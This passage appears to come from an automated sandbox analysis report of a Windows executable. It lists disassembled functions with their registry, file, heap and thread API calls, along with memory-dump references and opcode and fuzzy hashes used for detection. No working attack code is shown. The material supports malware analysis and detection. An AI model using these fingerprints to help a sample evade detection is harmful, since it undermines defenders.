                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Peek$DispatchTranslate
                                                                • String ID:
                                                                • API String ID: 1795658109-0
                                                                • Opcode ID: ae7f03681cd0f7dda4661774ca8815e32225d293ff1f0faf84106d4128c82ee8
                                                                • Instruction ID: 9eca8df32d057c037c574407abdcba98e5b0a17b00d10722842044dcfec41593
                                                                • Opcode Fuzzy Hash: ae7f03681cd0f7dda4661774ca8815e32225d293ff1f0faf84106d4128c82ee8
                                                                • Instruction Fuzzy Hash: D101A476284345BAE230EB54AC82F7777ACAB84B50F54486DF700AA1C1D674F908CB7D
                                                                Function 004DE2BB Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLastError.KERNEL32(0042DE27,0000FFFF,004E3A45,004E206C,004E1AE3,00000000), ref: 004DE2BD
                                                                • TlsGetValue.KERNEL32 ref: 004DE2CB
                                                                • SetLastError.KERNEL32(00000000), ref: 004DE317
                                                                  • Part of subcall function 004E443B: RtlAllocateHeap.NTDLL(00000008,004DE2E0,00000000), ref: 004E4531
                                                                • TlsSetValue.KERNEL32(00000000), ref: 004DE2EF
                                                                • GetCurrentThreadId.KERNEL32 ref: 004DE300
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue$AllocateCurrentHeapThread
                                                                • String ID:
                                                                • API String ID: 2047054392-0
                                                                • Opcode ID: e0f20cdabe12b267afee74fe0408e98074a78e88814ff2f36ad17055a26931b7
                                                                • Instruction ID: 9cfceb27de6fa578779b947294b76644bd7ff713ca9351039eb84c9266a3141e
                                                                • Opcode Fuzzy Hash: e0f20cdabe12b267afee74fe0408e98074a78e88814ff2f36ad17055a26931b7
                                                                • Instruction Fuzzy Hash: 08F0BB316057519BD7313FB2BC5D62B7A55AF427B1710062FF9419E3E1CB798C028758
                                                                Function 00500AA8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: caff0c0b2992d962131ef94fc7d89afbd958209b3a5473da6f326e9259f9c048
                                                                • Instruction ID: ca5e2d21c7df75ad1bf28fecf05506ad1f39754e4b284112e42f6da0ceb8defa
                                                                • Opcode Fuzzy Hash: caff0c0b2992d962131ef94fc7d89afbd958209b3a5473da6f326e9259f9c048
                                                                • Instruction Fuzzy Hash: 5D516B31A082554BEF358A3898513FEFFA1BF96308F1855DDCCCA5B2C2DA625D82C780
                                                                Function 004CA190 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25memorywindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(004CA418,00000001,?,80000301,00000000), ref: 004CA199
                                                                • RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 004CA1AD
                                                                • MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA1C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: d3882239744023b33d44da9ab199a84a29a20a27f39183c734b168b615eadf13
                                                                • Instruction ID: 8a6f1b0fd2e26a177ced3a624d2d5e3583a7a4520407ac1e3a69f2c73f047605
                                                                • Opcode Fuzzy Hash: d3882239744023b33d44da9ab199a84a29a20a27f39183c734b168b615eadf13
                                                                • Instruction Fuzzy Hash: 3FE0D875A40311BFD7225F64BC59F073B5CAB04B6CF05002DF806E6691EA649C10875A
                                                                Function 004CCB60 Relevance: 6.2, APIs: 4, Instructions: 162registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 004CCBE0
                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,80000004,00000000,00000000,00000000), ref: 004CCC26
                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,80000004,00000000,00000000), ref: 004CCC5B
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,80000004,00000000,00000000,00000000), ref: 004CCC97
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen
                                                                • String ID:
                                                                • API String ID: 1586453840-0
                                                                • Opcode ID: 32b76f72a0b9bb12ce1989b296d87482098ebf863adc7963c3aa1277427bc4be
                                                                • Instruction ID: 77f2072394603a79bbd806cbcc9b384335e57fb382f6222d9fcf9a9c1bf79407
                                                                • Opcode Fuzzy Hash: 32b76f72a0b9bb12ce1989b296d87482098ebf863adc7963c3aa1277427bc4be
                                                                • Instruction Fuzzy Hash: F241E4752002015BE354DA799C95E6B77D8EFC1324F140A2FF919C7382EA69DC0583AA
                                                                Function 0057AD74 Relevance: 6.1, APIs: 4, Instructions: 128COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __write$__getbuf__getptd_noexit__lseeki64
                                                                • String ID:
                                                                • API String ID: 4182129353-0
                                                                • Opcode ID: 98814c00e7e5b65e1b8524d47a8fdd61d168a32b78bd92914a392997cdf756a1
                                                                • Instruction ID: 5452d87f978f26a63625f9b0f53007fc5897ef72018dfa6d18b148897fce0334
                                                                • Opcode Fuzzy Hash: 98814c00e7e5b65e1b8524d47a8fdd61d168a32b78bd92914a392997cdf756a1
                                                                • Instruction Fuzzy Hash: D341D371500B025FD7399F28E885A7E7FA8BFC5320B14C61DE8AE8B6D1D734D840AB52
                                                                Function 00432890 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37394a9f8b2a5cdc50024c82add3837a93a14a009a146b521223be1b8a3ede6b
                                                                • Instruction ID: 8e1ab2913389e50859e008fe528e8853b84cd408bc30a5da99d162cd88535edc
                                                                • Opcode Fuzzy Hash: 37394a9f8b2a5cdc50024c82add3837a93a14a009a146b521223be1b8a3ede6b
                                                                • Instruction Fuzzy Hash: CF418DB96042018FD715DF09E84069AB7E5FFCD321F8445AFD88487361E7B9984ACB62
                                                                Function 0042E490 Relevance: 6.1, APIs: 4, Instructions: 90registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,000F003F,?,?,?,000006A8,00000000,80000004), ref: 0042E509
                                                                • RegDeleteValueA.ADVAPI32(?,00000000,?,?,000006A8,00000000,80000004,?,?,?,?,?,?,?,00427B99,?), ref: 0042E519
                                                                • RegCloseKey.ADVAPI32(?,?,?,000006A8,00000000,80000004,?,?,?,?,?,?,?,00427B99,?), ref: 0042E52B
                                                                • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042E53B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 2185037004-0
                                                                • Opcode ID: 759c0e6658bbf6ac46b4d28220de9b3f2ab3691e8da31b8d6083ecb03489bb80
                                                                • Instruction ID: 342278fc7a7a4cde7e79c63a7acb2ec0288ea3c5b16def7e677433d138efb5fc
                                                                • Opcode Fuzzy Hash: 759c0e6658bbf6ac46b4d28220de9b3f2ab3691e8da31b8d6083ecb03489bb80
                                                                • Instruction Fuzzy Hash: CC1105727042742BD234AAB6AC45F3B778CEB846B5F04072EFD46D7381DA28DC0182E8
                                                                Function 0042E210 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005), ref: 0042E228
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E267
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E27A
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 0042E295
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateWrite
                                                                • String ID:
                                                                • API String ID: 3602564925-0
                                                                • Opcode ID: 13a3b1472709f83eaa751b6af4817dd761e320891984dbea1e6e145f61f50184
                                                                • Instruction ID: d2488141c9ba4019a1cb3b512ed645dc8158cad692f90bd4fa358afa0a6a3d76
                                                                • Opcode Fuzzy Hash: 13a3b1472709f83eaa751b6af4817dd761e320891984dbea1e6e145f61f50184
                                                                • Instruction Fuzzy Hash: 0A117C32304342ABD710DF58ECC5F6AB3E8FB84724F54096AFA5597281D374E809876A
                                                                Function 004D4554 Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 004D457C
                                                                • RtlAllocateHeap.NTDLL(00000008,000041C4,?), ref: 004D45B0
                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004D45CA
                                                                • HeapFree.KERNEL32(00000000,?), ref: 004D45E1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$Allocate$AllocFreeVirtual
                                                                • String ID:
                                                                • API String ID: 94566200-0
                                                                • Opcode ID: e4d2d697c5f36891b602c329ca882eb83c8cc0b9583e54b2f8db77c091f3dd81
                                                                • Instruction ID: a69f35a7f1a0382f33856beed9f63c1ef6beecd9f9bbb19d849be5f8af7ba7ea
                                                                • Opcode Fuzzy Hash: e4d2d697c5f36891b602c329ca882eb83c8cc0b9583e54b2f8db77c091f3dd81
                                                                • Instruction Fuzzy Hash: A6116A70240601EFCB21AF18EC959267BB6FB963207186A2EF252C72F1C331B945CF15
                                                                Function 004CC370 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(0044C863,80000000,00000003,00000000,00000003,00000020,00000000,00000000,0044C863,00000001,00000000,00000000,80000004), ref: 004CC385
                                                                • GetFileSize.KERNEL32(00000000,?,004FEE96,00000268), ref: 004CC39C
                                                                  • Part of subcall function 004CA190: GetProcessHeap.KERNEL32(004CA418,00000001,?,80000301,00000000), ref: 004CA199
                                                                  • Part of subcall function 004CA190: RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 004CA1AD
                                                                  • Part of subcall function 004CA190: MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA1C6
                                                                • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000), ref: 004CC3C8
                                                                • CloseHandle.KERNEL32(00000000), ref: 004CC3CF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Heap$AllocateCloseCreateHandleMessageProcessReadSize
                                                                • String ID:
                                                                • API String ID: 749537981-0
                                                                • Opcode ID: 5f05dea00fa0cae425c06bf5ca14a4f679cfa2bbec402f25a2298a1d3765780f
                                                                • Instruction ID: 424bbcaab471c7c580d975ec2572d64688d953248b2ce2ab3da943a2483f3f47
                                                                • Opcode Fuzzy Hash: 5f05dea00fa0cae425c06bf5ca14a4f679cfa2bbec402f25a2298a1d3765780f
                                                                • Instruction Fuzzy Hash: 11F044762043407BE3219B64ECC9F9B77ACDB88B20F104A2DF646DB1D1E6B4A944C765
                                                                Function 004E68C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(006B94F8,00000001), ref: 004E68E8
                                                                • RtlInitializeCriticalSection.NTDLL(006B94E0), ref: 004E68F3
                                                                • RtlEnterCriticalSection.NTDLL(006B94E0), ref: 004E6932
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                                                • String ID:
